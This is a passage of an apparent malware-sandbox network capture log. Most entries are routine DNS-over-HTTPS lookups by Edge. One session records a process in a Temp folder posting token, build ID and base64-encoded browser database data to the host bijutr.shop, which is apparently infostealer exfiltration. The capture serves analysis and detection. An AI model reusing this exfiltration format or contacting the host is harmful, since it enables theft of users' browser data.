                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0f 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      20192.168.2.749848172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725df8b1a8ca7-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0e 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      21192.168.2.749851188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----RQIEU3EUA1N7YM7GV37Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 207993
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------RQIEU3EUA1N7YM7GV37QContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------RQIEU3EUA1N7YM7GV37QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------RQIEU3EUA1N7YM7GV37QCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                      Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      22192.168.2.749852172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725e17bb6c327-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      23192.168.2.749854172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      24192.168.2.749853172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      25192.168.2.749841142.250.181.654432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
